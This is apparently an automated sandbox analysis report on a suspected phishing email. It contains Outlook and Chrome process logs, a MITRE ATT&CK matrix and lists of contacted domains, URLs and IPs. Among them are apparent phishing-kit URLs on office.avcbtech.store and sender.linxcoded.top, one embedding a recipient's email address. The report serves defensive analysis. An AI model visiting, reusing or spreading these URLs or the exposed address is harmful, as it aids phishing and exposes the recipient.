      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,740971170402014569,13365683577159135004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile opened: C:\Windows\SysWOW64\MsftEdit.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow detected: Number of UI elements: 14
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
      Source: phish_alert_sp2_2.0.0.0.emlStatic file information: File size 3463867 > 1048576
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation21
      Browser Extensions      		1
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      Process Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Modify Registry      		LSASS Memory1
      File and Directory Discovery      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Extra Window Memory Injection      		1
      Process Injection      		Security Account Manager13
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      File Deletion      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Extra Window Memory Injection      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Screenshots

      Download Video

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      phish_alert_sp2_2.0.0.0.eml2%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=jmall@murexltd.com0%Avira URL Cloudsafe
      file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtml0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      svc.ms-acdc-teams.office.com
      		52.123.251.29
      		truefalse
        		high
        s-part-0012.t-0009.t-msedge.net
        		13.107.246.40
        		truefalse
          		high
          office.avcbtech.store
          		139.28.36.38
          		truefalse
            		high
            code.jquery.com
            		151.101.130.137
            		truefalse
              		high
              www.google.com
              		142.251.35.164
              		truefalse
                		high
                sender.linxcoded.top
                		185.174.100.20
                		truefalse
                  		high
                  ipv4.imgur.map.fastly.net
                  		151.101.44.193
                  		truefalse
                    		high
                    i.imgur.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://otelrules.svc.static.microsoft/rules/rule701151v1s19.xmlfalse
                        		high
                        https://otelrules.svc.static.microsoft/rules/rule704001v0s19.xmlfalse
                          		high
                          https://otelrules.svc.static.microsoft/rules/rule702151v1s19.xmlfalse
                            		high
                            https://otelrules.svc.static.microsoft/rules/rule700151v1s19.xmlfalse
                              		high
                              https://otelrules.svc.static.microsoft/rules/rule703151v1s19.xmlfalse
                                		high
                                https://otelrules.svc.static.microsoft/rules/rule120630v0s19.xmlfalse
                                  		high
                                  https://otelrules.svc.static.microsoft/rules/rule120645v0s19.xmlfalse
                                    		high
                                    https://otelrules.svc.static.microsoft/rules/rule700001v2s19.xmlfalse
                                      		high
                                      https://otelrules.svc.static.microsoft/rules/rule701751v1s19.xmlfalse
                                        		high
                                        https://otelrules.svc.static.microsoft/rules/rule120663v0s19.xmlfalse
                                          		high
                                          https://otelrules.svc.static.microsoft/rules/rule701301v1s19.xmlfalse
                                            		high
                                            https://otelrules.svc.static.microsoft/rules/rule702751v1s19.xmlfalse
                                              		high
                                              https://otelrules.svc.static.microsoft/rules/rule702301v1s19.xmlfalse
                                                		high
                                                https://otelrules.svc.static.microsoft/rules/rule120609v0s19.xmlfalse
                                                  		high
                                                  https://otelrules.svc.static.microsoft/rules/rule120627v0s19.xmlfalse
                                                    		high
                                                    https://otelrules.svc.static.microsoft/rules/rule703601v0s19.xmlfalse
                                                      		high
                                                      https://otelrules.svc.static.microsoft/rules/rule700751v1s19.xmlfalse
                                                        		high
                                                        https://otelrules.svc.static.microsoft/rules/rule700301v1s19.xmlfalse
                                                          		high
                                                          https://otelrules.svc.static.microsoft/rules/rule701550v1s19.xmlfalse
                                                            		high
                                                            https://otelrules.svc.static.microsoft/rules/rule700100v1s19.xmlfalse
                                                              		high
                                                              https://otelrules.svc.static.microsoft/rules/rule702550v1s19.xmlfalse
                                                                		high
                                                                https://otelrules.svc.static.microsoft/rules/rule700550v1s19.xmlfalse
                                                                  		high
                                                                  https://otelrules.svc.static.microsoft/rules/rule703400v0s19.xmlfalse
                                                                    		high
                                                                    https://otelrules.svc.static.microsoft/rules/rule700901v1s19.xmlfalse
                                                                      		high
                                                                      https://otelrules.svc.static.microsoft/rules/rule701100v1s19.xmlfalse
                                                                        		high
                                                                        https://otelrules.svc.static.microsoft/rules/rule700400v2s19.xmlfalse
                                                                          		high
                                                                          https://otelrules.svc.static.microsoft/rules/rule701901v1s19.xmlfalse
                                                                            		high
                                                                            https://otelrules.svc.static.microsoft/rules/rule120635v0s19.xmlfalse
                                                                              		high
                                                                              https://otelrules.svc.static.microsoft/rules/rule703850v0s19.xmlfalse
                                                                                		high
                                                                                https://otelrules.svc.static.microsoft/rules/rule702901v1s19.xmlfalse
                                                                                  		high
                                                                                  https://otelrules.svc.static.microsoft/rules/rule120612v0s19.xmlfalse
                                                                                    		high
                                                                                    https://otelrules.svc.static.microsoft/rules/rule703000v1s19.xmlfalse
                                                                                      		high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule120681v0s19.xmlfalse
                                                                                        		high
                                                                                        https://otelrules.svc.static.microsoft/rules/rule120640v0s19.xmlfalse
                                                                                          		high
                                                                                          https://otelrules.svc.static.microsoft/rules/rule703450v1s19.xmlfalse
                                                                                            		high
                                                                                            https://otelrules.svc.static.microsoft/rules/rule700700v1s19.xmlfalse
                                                                                              		high
                                                                                              https://otelrules.svc.static.microsoft/rules/rule702000v1s19.xmlfalse
                                                                                                		high
                                                                                                https://otelrules.svc.static.microsoft/rules/rule702450v1s19.xmlfalse
                                                                                                  		high
                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120617v0s19.xmlfalse
                                                                                                    		high
                                                                                                    https://otelrules.svc.static.microsoft/rules/rule703750v0s19.xmlfalse
                                                                                                      		high
                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703300v0s19.xmlfalse
                                                                                                        		high
                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700450v1s19.xmlfalse
                                                                                                          		high
                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701700v1s19.xmlfalse
                                                                                                            		high
                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702700v1s19.xmlfalse
                                                                                                              		high
                                                                                                              https://otelrules.svc.static.microsoft/rules/rule700851v1s19.xmlfalse
                                                                                                                		high
                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703701v0s19.xmlfalse
                                                                                                                  		high
                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule701851v1s19.xmlfalse
                                                                                                                    		high
                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702851v1s19.xmlfalse
                                                                                                                      		high
                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120619v0s19.xmlfalse
                                                                                                                        		high
                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700600v1s19.xmlfalse
                                                                                                                          		high
                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120625v0s19.xmlfalse
                                                                                                                            		high
                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120622v0s19.xmlfalse
                                                                                                                              		high
                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120653v0s19.xmlfalse
                                                                                                                                		high
                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702600v1s19.xmlfalse
                                                                                                                                  		high
                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120647v0s19.xmlfalse
                                                                                                                                    		high
                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule224900v0s19.xmlfalse
                                                                                                                                      		high
                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703100v1s19.xmlfalse
                                                                                                                                        		high
                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120668v0s19.xmlfalse
                                                                                                                                          		high
                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702100v1s19.xmlfalse
                                                                                                                                            		high
                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120620v0s19.xmlfalse
                                                                                                                                              		high
                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                                		high
                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120128v0s19.xmlfalse
                                                                                                                                                  		high
                                                                                                                                                  https://i.imgur.com/0HdPsKK.pngfalse
                                                                                                                                                    		high
                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120650v0s19.xmlfalse
                                                                                                                                                      		high
                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703551v0s19.xmlfalse
                                                                                                                                                        		high
                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703051v3s19.xmlfalse
                                                                                                                                                          		high
                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120661v0s19.xmlfalse
                                                                                                                                                            		high
                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120655v0s19.xmlfalse
                                                                                                                                                              		high
                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120614v0s19.xmlfalse
                                                                                                                                                                		high
                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120639v0s19.xmlfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule704200v0s19.xmlfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702200v1s19.xmlfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule704050v0s19.xmlfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700350v1s19.xmlfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120648v0s19.xmlfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120657v0s19.xmlfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702500v1s19.xmlfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120660v0s19.xmlfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703500v0s19.xmlfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703950v0s19.xmlfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule700200v1s19.xmlfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700500v1s19.xmlfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule701650v1s19.xmlfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule224902v2s19.xmlfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule700950v1s19.xmlfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120651v0s19.xmlfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://sender.linxcoded.top/start/xls/includes/css6.cssfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120402v21s19.xmlfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120642v0s19.xmlfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702950v1s19.xmlfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120629v0s19.xmlfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702651v1s19.xmlfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120623v0s19.xmlfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702201v1s19.xmlfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120658v0s19.xmlfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://i.imgur.com/KAb5SEy.pngfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule703951v0s19.xmlfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120676v0s19.xmlfalse
                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              1.1.1.1
                                                                                                                                                                                                                              		unknownAustralia
                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              142.251.35.170
                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                              13.107.246.40
                                                                                                                                                                                                                              		s-part-0012.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                              185.174.100.20
                                                                                                                                                                                                                              		sender.linxcoded.topUkraine
                                                                                                                                                                                                                              		8100ASN-QUADRANET-GLOBALUSfalse
                                                                                                                                                                                                                              139.28.36.38
                                                                                                                                                                                                                              		office.avcbtech.storeUkraine
                                                                                                                                                                                                                              		42331FREEHOSTUAfalse
                                                                                                                                                                                                                              151.101.44.193
                                                                                                                                                                                                                              		ipv4.imgur.map.fastly.netUnited States
                                                                                                                                                                                                                              		54113FASTLYUSfalse
                                                                                                                                                                                                                              172.253.122.84
                                                                                                                                                                                                                              		unknownUnited States
